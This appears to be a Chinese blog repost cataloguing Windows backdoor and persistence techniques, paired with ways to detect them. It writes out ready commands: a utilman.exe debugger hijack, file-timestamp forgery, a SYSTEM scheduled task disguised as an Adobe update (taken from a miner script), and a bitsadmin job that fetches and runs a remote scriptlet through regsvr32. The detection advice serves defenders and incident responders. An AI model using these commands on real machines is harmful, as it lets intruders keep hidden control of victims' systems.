windows常见后门隐藏和权限维持方法及排查技术

最新推荐文章于 2024-03-14 14:58:18 发布
最新推荐文章于 2024-03-14 14:58:18 发布
阅读量6.4k 收藏 24
点赞数 3
分类专栏: 内网渗透

https://xz.aliyun.com/t/4842

这片文章中隐藏webshell我觉得很nice ... 进程注入以前试过 ... wmi 和 bitsadmin 可以了解下 ...

 

常见backdoor和persistence方式方法

系统工具替换后门

Image 劫持辅助工具管理器
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f


  • 类似的程序有osk.exe、Narrator.exe、Magnify.exe等。
  • 优点:简单
  • 缺点:易被检测
  • 排查:工具autoruns

文件隐藏

attrib命令隐藏(重点!)

  • windows自带命令行工具attrib用来显示或更改文件属性。
  • 优点:简单,一般的工具(D盾)扫描不到
  • 缺点:暂无
  • 排查:使用attrib命令查看

使用ADS流隐藏webshell(重点!!)

  • 使用ADS流隐藏webshell,目前可过D盾扫描,注意ADS的一句话木马无法直接连接,可以使用php的include去包含执行


    文章参考:利用ADS隐藏webshell
    文章参考: Windows ADS在渗透测试中的妙用
  • 此外应该注意修改文件的timestamp,可使用如下的powershell命令或者使用NewFileTime工具
$(Get-Item ).creationtime=$(Get-Date "mm/dd/yyyy hh:mm am/pm")
$(Get-Item ).lastaccesstime=$(Get-Date "mm/dd/yyyy hh:mm am/pm")
$(Get-Item ).lastwritetime=$(Get-Date "mm/dd/yyyy hh:mm am/pm")
example:
Set the last-access time for a file aaa.csv to the current time:  $(Get-Item aaa.csv).lastwritetime=$(Get-Date)
Set the creation time of a file foo.txt to November 24, 2015, at 6:00am: $(Get-Item foo.txt).creationtime=$(Get-Date "11/24/2015 06:00 am")
  • 优点:较难检测
  • 缺点:暂无
  • 排查: dir /r

计划任务

  • schtasks和at命令,例如下面的命令
#from https://github.com/diggles9991/MG/blob/master/XMR/Hook.ps1#L12
# Update scheduled Start Task
SCHTASKS /Delete /tn "AdobeReaderUpdate" /f
SCHTASKS /Create /RU "SYSTEM" /tn "AdobeReaderUpdate" /sc Weekly /d * /st 18:00:00 /tr "powershell.exe C:\Windows\System32\drivers\en-US\etc\Line.ps1"

# Update scheduled End Task
# SCHTASKS /Delete /tn "AdobeReaderUpdateEnd" /f
SCHTASKS /Create /RU "SYSTEM" /tn "AdobeReaderUpdateEnd" /sc Weekly /d MON,TUE,WED,THU,FRI /st 06:00:00 /tr "powershell.exe Stop-Process -Name $processname"
  • 优点:简单
  • 缺点:易被检测
  • 排查: schtasks /query 命令进行查询或者通过计算机的管理查看,注意在windows的中文版系统中,schtasks命令需要切换字符为美国英语格式,使用命令chcp 437,或者直接工具autoruns。

开机启动项

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
等
  • 优点:重启权限维持
  • 缺点:一般杀软均会拦截
  • 排查:一个一个手工查太麻烦,建议直接上autoruns。

服务

sc create [ServerName] binPath= BinaryPathName
  • 优点:重启权限维持
  • 缺点:一般杀软会拦截
  • 排查:工具autoruns

waitfor.exe

  • 不支持自启动,但可远程主动激活,后台进程显示为waitfor.exe
    详细参考
  • 优点:远程主动激活
  • 缺点:有waitfor进程
  • 排查:通过Process Explorer工具查看是否有waitfor.exe进程,并进一步查看启动参数等。

bitsadmin后门

  • Bitsadmin从win7之后操作系统就默认包含,可以用来创建上传或者下载任务。Bistadmin可以指定下载成功之后要进行什么命令。后门就是利用的下载成功之后进行命令执行。
#创建一个下载任务:
bitsadmin /create backdoor
#添加文档:
bitsadmin /addfile backdoor %comspec%  %temp%\cmd.exe
#设置下载成功之后要执行的命令:
bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll"
#执行任务:
bitsadmin /Resume backdoor

WMI后门(重点!)

  • 在2015年的blackhat大会上Matt Graeber介绍了一种无文件后门就是用的wmi。更多可以参考
  • 在empire中有相应的module,作者参考使用了Powersploit里面的代码。

  • 后门在系统重启五分钟之内触发且是system权限。
  • 优点:无文件,相对来说难以排查
  • 缺点:暂无
  • 排查:工具autoruns

COM劫持

meterpreter 权限维持

  • meterpreter中的权限维持技术有两种,一种是metsvc的后门(服务后门),另外一种是persistence(注册表后门)
  • metsvc 是开机自启动的服务型后门

    metsvc代码
  • persistence模块是先上传vbs脚本并执行vbs脚本修改注册表HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run从而完成自启动。


    persistence代码
  • 优点:开机自启动
  • 缺点:容易被杀软杀
  • 排查:像是这种后门使用autoruns基本都可以排查出来。

Empire persistence模块(重点!!)

  • Empire是一款功能非常强大的后渗透攻击框架。其中的persistence模块提供了一系列权限维持方法。
  • 工具还把权限维持分为了四大类,userland(普通权限)、elevated(需要高权限)、powerbreach(内存权限维持,重启后失效)、miscellaneous(其它)。
  • 通过info命令查看使用方法

    更多可以参考文章
  • 优点:基本集成了大部分的权限维持方法
  • 缺点:暂无
  • 排查:工具autoruns

进程注入(重点!!)

  • 准确来说进程注入不是后门技术或者权限维持技术,而是一种隐藏技术,这里简单说一下empire的psinject、cobaltstrike的inject和meterpreter中的migrate进程注入,一般可以注入到像是lsass或者explorer这样的进程当中,相对比较隐蔽,较难排查。
  • 使用方法这里就不介绍了,主要说一下如何hunting。这篇文章TALES OF A BLUE TEAMER: DETECTING POWERSHELL EMPIRE SHENANIGANS WITH SYSINTERNALS里面介绍了如何hunting empire方法,empire有一些evasion detection机制,其中的网络连接时间设置能有效避开常见主机流量检测工具(包括netstat、tcpview)的检测,文章中也介绍了使用process monitor是最快也是最有效的方法。
  • 但是在hunting 进程注入的时候,并没有像文章中说的查找到以起始地址为0x0的线程,但会发现被注入的进程属性里会有.NET Assemblies和.NET Performance两个菜单。如下图所示
  • 优点:较难排查
  • 缺点:暂无
  • 排查:工具process explorer 、process monitor

other

  • 除了以上的几种后门和权限维持技术外还有像是dll劫持、一些软件的插件后门、office后门等。
  • 抛砖引玉,更多windows backdoor方面最新文章可以关注国外安全研究员Casey Smith@subTee和Adam@Hexacorn。
  • 附上本人博客地址,欢迎一起交流学习:> https://kevien.github.io/
PD_3569
关注
  • 3
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
木马/后门程序在WINNT中进程隐藏和查找的方法
11-06
本文试图通过探讨WINNT中木马的几种常用隐藏进程手段,给大家揭示木马/后门程序在WINNT中进程隐藏方法和查找的途径。  我们知道,在WINDOWS系统下,可执行文件主要是Exe和Com文件,这两种文件在运行时都有一个...
网络安全攻防红队常用命令
网络安全
01-26 3102
网络安全攻防红队常用命令
【千万不能错过】资深渗透测试工程师的渗透技巧总结(67个Tips)
xxwn200301的博客
08-22 1044
本质上是DLL文件,后缀名为cpl,包含一个导出函数CPLApplet(c实现可不指定)执行方法:(1)双击直接运行(2)cmd(3)cmd(4)vbsDim obj(5)js参考:《CPL文件利用介绍》
Windows粘滞键后门
最新发布
carmi的博客
03-14 452
此时假如该设备设置了这种粘滞键的话就可以通过调出cmd窗口(管理员状态)进行用户的创建,并将该用户归入到管理员组当中,就可以实现没有用户信息即可登入设备的操作——粘滞键后门。在C:/Windows/System32这个目录(系统进程的目录)下可找到粘滞键sethc这个应用程序(系统进程)。出现这种情况的原因是:由于刚刚已经将权限给到管理员,但管理员的权限始终未变化,所以还是不能修改文件名称(提高)。右键cmd属性打开发现Administrators这个组的成员根本没有对该文件的完全控制权限
渗透测试入门7之权限维持
鹿鸣天涯
04-03 1255
渗透测试入门7之权限维持 系统后门 Windows 1、密码记录工具 WinlogonHack WinlogonHack 是一款用来劫取远程3389登录密码的工具,在 WinlogonHack 之前有 一个 Gina 木马主要用来截取 Windows 2000下的密码,WinlogonHack 主要用于截 取 Windows XP 以及 Windows 2003 Server。 键盘记录器...
Ubuntu20.04查看开机自启动及其设置开机自启(设置rc.local)
热门推荐
qq_41985134的博客
11-06 3万+
Ubuntu systemctl 查看系统启动项 列出所有启动项: sudo systemctl list-unit-files 使用grep过滤一下开启的grep enabled sudo systemctl list-unit-files | grep enabled 查看.service文件的路径,及内容 sudo systemctl status openresty.service 禁用开机启动: sudo systemctl disable nginx.service 停止已经开启的
使用 autoruns.exe 来查看自动启动的程序
talk is cheap;Later equals never;如果对你有帮助,点赞就行,没有建设性的建议请别留言:P
07-26 1464
用 Windows Sysinternals 的 autoruns.exe 可以查看开机启动的程序. 用处: * 有时,计算机上浏览网页时, 会自动跳出一个广告页面。可以手工删除. * 或卸载完后, 计算机注册表内有残留。 可以手工删除 * 自己做完Windows Service的实验后,任务管理器中有好多自己的无效服务名称, 没有了对应的实体文件. 可以手工删除 * 对于自启动项中
Windows以及Linux的入侵排查
qq_60600840的博客
06-03 542
对于系统或者应用发生了安全事件之后的处理应急响应的处理分为事前和事后处理数据备份、风险评估、安全培训、应急演练等病毒检测、后门检测、系统恢复、清除病毒以及后门程序、调查与追踪、入侵者取证等。后门查杀
AutoRuns下载安装使用教程(图文教程)超详细
wangyuxiang946的博客
01-17 4522
AutoRuns 是微软提供的一款「启动项管理」工具,常在应急响应时查找启动项留下的后门。本篇文章详细介绍 AutoRuns 常用操作、界面功能介绍,并提供实战案例及思路。
启动项管理工具Autoruns使用实验(20)
yyj1781572的博客
03-06 2520
AutoRuns是一款启动项目管理工具,作用就是检查开机自动加载的所有程序,例如硬件驱动程序,windows核心启动程序和应用程序.它比windows自带的msconfig.exe还要强大,通过它我们还可以看到一些在msconfig里面无法查看到的病毒和木马以及恶意插件程序.还能够详细的把启动项目加载的所有程序列出来。
Windows7系统bitsadmin.exe文件丢失问题
amio555的专栏
12-29 814
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个bitsadmin.exe文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现bitsadmin.exe丢失要怎么解决?
Windows系统安全相关操作——值得拥有
weixin_45116657的博客
12-06 334
Windows常见的目录 //这个目录下存放着这个用户开机启动的程序 C:\Users\xie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup //这个目录下存放这开机自启的程序 C:\programData\Microsoft\Winodws\Start Menu\Programs\StartUp /...
利用安全描述符隐藏服务后门进行权限维持1
08-03
cmd 创建启动服务sc create ".NET CLR Networking 3.5.0.0" binpath= "cmd.exe /k C:\Users\
权限维持方法浅析.pdf
08-08
前情提要& 本集简介 Golden Ticket Silver Ticket SID History SID History -Golden Ticket Now More GOLDEN! Directory Service Restore Mode (DSRM) DSRM -Pass The Hash&DCSync Malicious Security Support ...
Windows服务与后门技术.zip
03-28
Windows服务与后门技术.zip
Windows常见的持久化后门汇总1
08-03
Windows常见的持久化后门汇总0x00:前言持久化后门是指当入侵者通过某种手段拿到服务器的控制权之后,通过在服务器上放置一些后门(脚本、进程、连接之类),来
渗透测试工具大全
黑战士的博客
01-12 1932
由本人亲测用过的工具,非常实用!
后门排查方法
XXokok的博客
12-01 103
排查后门时注意项有哪些
windows下载执行命令大全
weixin_30907523的博客
11-28 951
1.bitsadmin命令(只能命令下载到指定路径上,win7以上): bitsadmin /transfer myDownLoadJob /download /priority normal "http://img5.cache.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg" "d:\abc.jpg" bits...
Windows 常见权限维持方式
05-21
以下是 Windows 常见权限维持方式: 1. 提权攻击:攻击者通过利用系统或应用程序的漏洞,获取更高的权限。 2. 横向渗透:攻击者通过已经获得的用户帐户,尝试在网络内部扩散并获取更高的权限。 3. 后门:攻击者在系统中留下后门,使得他们可以随时远程访问系统。 4. 恶意代码:攻击者通过植入恶意代码来获取权限,如键盘记录器、木马等。 5. 弱口令:攻击者通过猜测或暴力破解密码来获取更高的权限。 6. 特权提升:攻击者通过以管理员身份运行的应用程序或服务,获取更高的权限。 7. 摆脱防御机制:攻击者通过绕过安全软件或删除安全软件来保持权限。 需要注意的是,要保护系统免受这些攻击,可以采取一系列措施,如定期更新系统和应用程序补丁、加强访问控制、使用安全软件等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值